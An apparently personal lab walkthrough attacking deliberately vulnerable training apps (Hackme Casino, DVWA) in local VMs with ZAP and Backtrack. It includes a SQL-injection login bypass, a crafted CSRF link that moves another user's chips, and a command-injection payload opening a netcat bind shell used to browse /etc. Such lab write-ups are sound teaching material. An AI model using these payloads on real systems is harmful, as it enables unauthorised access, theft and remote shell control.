Web Security Dojo – http://www.mavensecurity.com/web_security_dojo/
1. Down load VM or virtual box image. Install and click on Applications/Accessories (open) Terminal
Add an IP address
dojo@dojo-vm:~$ sudo ifconfig eth1 192.168.1.2 netmask 255.255.255.0 (press enter)
[sudo] password for dojo: dojo (press enter)
dojo@dojo-vm:~$
Hackme Casino
1. Click on Applications/Targets/Hackme Casino Start (firefox should startup and will state Offline mode) File un tick work offline, refresh
2. Open another VM or Virtual box machine I use Backtrack 5R1 click on Applications/Accessories (open) Terminal
Add an IP in the same network and check working by pining dojo IP address.
3. Open a browser in backtrack and type in http://192.168.1.2:3000 This should open the remote Hackme app
4. Let the fun begin!
5. Hit it with Nikto, W3af, Metasploit, Nessus anything you can think of.
As example of interesting tool www.myexploit.wordpress.com/web-application-owasp_zap/
Zap demo using Hackme Casino
1. Set firefox proxy in backtrack to point to Zap. In Firefox Edit/Preferences/Advanced/Network/Settings
Tick Manual proxy configuration HTTP Proxy = 127.0.0.1 and Port = 8080 OK, Close.
2. Start up zap root@bt:/pentest/web/owasp-zap# java -jar zap.jar and then refresh Firefox browser you should see 192.168.1.2:3000 under sites in ZAP.
3. Now proxy is working it’s time to Log in to Hackme Casino. For username use sqlinjection bellow no password required just add the sqlinjection and press enter.
') OR 1=1--
4. Now logged in lets try Cross-Site Request Forgery to steal some chips. This is a great example. The concept write a url string that once clicked by another user they will send you chips with out knowing.
To work you need another users account log out and log in as username: bobby_blackjack and the password: twenty_one
5. Go to Options/Transfer chips type in 0 and change recipient to andy_aces press enter
Response = This is not an acceptable value – This is great as an error sign
Now setup lets use it
1. ZAP / History Looking at this you will see trying to post the 0 chips below shows how the proxy shows this..
POST http://192.168.1.2:3000/account/transfer_chips
RAW data shows view transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips
2. From the results from ZAP create a url as bellow and paste into browser and resend. (Paste in and press enter)
3. The result show an interesting error screen (as can see bellow) it also has reformatted the input.(Why? I’m not sure! but yep it helps!)
Error reads – Unknown action
No action responded to transfer=000000000000000000&login[]=bobby_blackjack&commit=Transfer Chips
Note in the url Transfer+Chipsit it has added a + between Transfer Chipsit. So it does not like gaps, ok thanks for this info!
4. So now i try a different string made up from the errors and what i feel may work, http://192.168.1.2:3000/account/transfer=000000000000000000&login%5B%5D=andy_aces&commit=Transfer+Chips
No joy so more trying This time adding the findings and trying
5. The result no error signs so is it work? Nope as no chips are moved across, the problem is the use of / sign at end of transfer_chips = http://192.168.1.2:3000/account/transfer_chips/
we dont want to go to another directory we want to execute the command transfer=100&login%5B%5D=andy_aces&commit=Transfer+Chips
So trying to replace / with a ?
Results the chips go down. And andy_aces gets a nice gift!
For info if you write a Cross-Site Request Forgery it can be converted by Free URL redirection service like tinyur. So be careful opening links!
POST http://192.168.1.2:3000/account/transfer_chips
RAW view transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips
from results above create a url as bellow and paste into browser
The result is an error screen intresting because it has reformated the input.
Unknown action
No action responded to transfer=000000000000000000&login[]=bobby_blackjack&commit=Transfer Chips
and url changed too
This time adding the findings and trying
http://192.168.1.2:3000/account/transfer_chips/transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips
The result no error but no chips are moved across, the problem is http://192.168.1.2:3000/account/transfer_chips/ the /
/ = directory chnage but we want to execute the command transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips
So trying to replace / with a ?
http://192.168.1.2:3000/account/transfer_chips?transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips
Results the chips go down. So now if you replaced the username with your own and tricked another logged in user to click on the link
they would send you chips.
————————————————————-
DVWA
Command Execution
Web browser to
ip-address/dvwa/vulnerabilities/exec/
Vulnerability: Command Execution
Ping for FREE
type in to the box
remote-ip-address;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe
(press submit)
Open terminal and type in
root@bt:~# nc remote-ip-address 13371
cd /etc
ls -l
total 1104
drwxr-xr-x 5 root root 4096 Aug 16 2010 ConsoleKit
drwxr-xr-x 5 root root 4096 Jul 3 07:06 NetworkManager
drwxr-xr-x 2 root root 4096 Dec 4 2009 ODBCDataSources
drwxr-xr-x 10 root root 4096 Aug 16 2010 X11
drwxr-xr-x 3 root root 4096 Aug 16 2010 acpi
-rw-r–r– 1 root root 2981 Aug 16 2010 adduser.conf
drwxr-xr-x 2 root root 12288 Jul 3 07:25 alternatives
-rw-r–r– 1 root root 395 Mar 4 2010 anacrontab
drwxr-xr-x 7 root root 4096 Jun 29 04:55 apache2
drwxr-xr-x 6 root root 4096 Aug 16 2010 apm
drwxr-xr-x 3 root root 4096 Aug 16 2010 apparmor
drwxr-xr-x 7 root root 4096 Sep 30 2010 apparmor.d
myexploit 